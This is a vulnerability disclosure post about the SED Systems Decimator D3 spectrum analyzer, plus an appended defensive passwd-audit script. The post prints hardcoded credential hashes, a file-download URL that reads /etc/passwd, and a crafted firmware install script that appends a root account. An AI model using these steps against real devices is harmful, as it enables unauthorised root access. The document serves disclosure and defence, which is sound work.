During a recent penetration test, MDSec found several vulnerabilities in an RF spectrum analyzer that was exposed to the Internet. The SED Systems Decimator D3 is the third generation of SED’s popular Decimator spectrum analyzer, providing a frequency range of 5MHz to 3GHz and a lightning-fast measurement refresh rate. More information on SED Systems Decimator D3 devices can be found at the vendor’s website.

Identification of the vulnerable device can be performed by scanning for TCP port 9784, which offers a default remote API. When connected to, this service announces itself with “connected”, similar to the following output:

[code lang="bash"]Connected to x.x.x.x.
Escape character is '^]'.
connected
status
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
ping
ping:ok[/code]

The web service by default has a user interface for accessing the RF analyzer capability. Using the API, the device can also give raw remote access to I/Q samples which would provide a means to remotely sniff the RF spectrum. The Web Configuration Manager can be found under the “/cgi-bin/wcm.cgi” URI. Firmware for the device was downloaded and several vulnerabilities were found to be present within the device services.

Firstly, the device was shipped with hardcoded credentials, which had existed in the default firmware since at least February 2013. The following entries can be found in the “/etc/passwd” file:

[code lang="bash"]root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly[/code]

The admin user has a default password of “admin”. At this time the root user’s password is unknown; however, there is no documented way of trivially changing it on a device. Using the “admin” user it was possible to obtain a web session to the Web Configuration Manager application and exploit a hidden arbitrary file download vulnerability discovered by reverse engineering the firmware:

http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd

This will allow you to download any file from the device, because the “admin” user has privileges equivalent to root. To execute arbitrary code a third vulnerability was exploited, this time within the firmware flashing routine. By uploading a crafted tarball that contains an “install” script in its root, the device will accept your firmware and then attempt to execute “./install”. To prevent bricking/modification of the device, the flashing process can then be subsequently canceled. The vulnerability exists in the “/usr/bin/install_flash” command, which after using “tar” to unpack an archive to a tmp folder of “/tmp/PID_of_tar” does the following:

[code lang="bash"]# If the archive contained its own install script then use that

if [ -x ./install ]; then
    ./install $all_args
    rc=$?
    exit $rc
fi
[/code]

Using this vulnerability it is possible to upload a “.tar” file containing an “install” file that looks like the following to obtain a root user account with “adm1n/admin”:

[code lang="bash"]cat install
#!/bin/sh
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd[/code]

Using the newly created account it is now possible to SSH remotely to the device, as PermitRootLogin is enabled by default. The screenshot below shows successful exploitation of this weakness to obtain remote root privileges:

MDSec have since provided details of these vulnerabilities to the manufacturer, who have updated and released a new firmware image which is intended to address these weaknesses. The new firmware patches have not been verified; however, it is advised that all users of SED Systems Decimator D3 devices update to the latest firmware version to prevent exploitation of these weaknesses by malicious parties.
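A defensive check for the account weaknesses described above, as an added example that is not part of the original post or the vendor's firmware: it audits a passwd file (copied from a device or taken from an unpacked firmware image) for extra UID 0 accounts, non-root accounts in GID 0, the default admin hash quoted earlier, and password hashes kept in the world-readable passwd file. The function names, finding labels and sample file are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit a passwd file for the account weaknesses in this post.
# DEFAULT_ADMIN_HASH is the hash of the shipped "admin" entry quoted above.
DEFAULT_ADMIN_HASH='$1$$CoERg7ynjYLsj2j4glJ34.'

# audit_passwd FILE
# Prints one "<FINDING> <account>" line per issue; returns 1 if any was found.
audit_passwd() {
    awk -F: -v def="$DEFAULT_ADMIN_HASH" '
        NF < 7 || /^#/ { next }                 # skip blank/malformed lines
        # Any UID 0 account other than root is a second superuser.
        $3 == 0 && $1 != "root" { print "UID0_NON_ROOT " $1; bad = 1 }
        # Non-root accounts in GID 0 inherit group-root file access.
        $4 == 0 && $3 != 0      { print "GID0_MEMBER " $1; bad = 1 }
        # Hash identical to the shipped default: password is still "admin".
        $2 == def               { print "DEFAULT_HASH " $1; bad = 1 }
        # A real hash in passwd (not "x") is readable by every local user.
        $2 ~ /^\$/              { print "HASH_IN_PASSWD " $1; bad = 1 }
        END { exit bad }
    ' "$1"
}

# Constructed sample: the shipped admin entry plus a rogue UID 0 account of
# the kind the install-script issue could append. Not taken from a real device.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly
adm1n:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh
nobody:x:65534:65534:nobody:/:/bin/false
EOF
}

# Stand-alone use: sh audit_passwd.sh /path/to/passwd
if [ "$#" -gt 0 ]; then
    audit_passwd "$1"
fi
```

A non-zero exit status means at least one finding, so the function can gate a firmware acceptance check or a periodic configuration audit.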

This blog post was written by @hackerfantastic.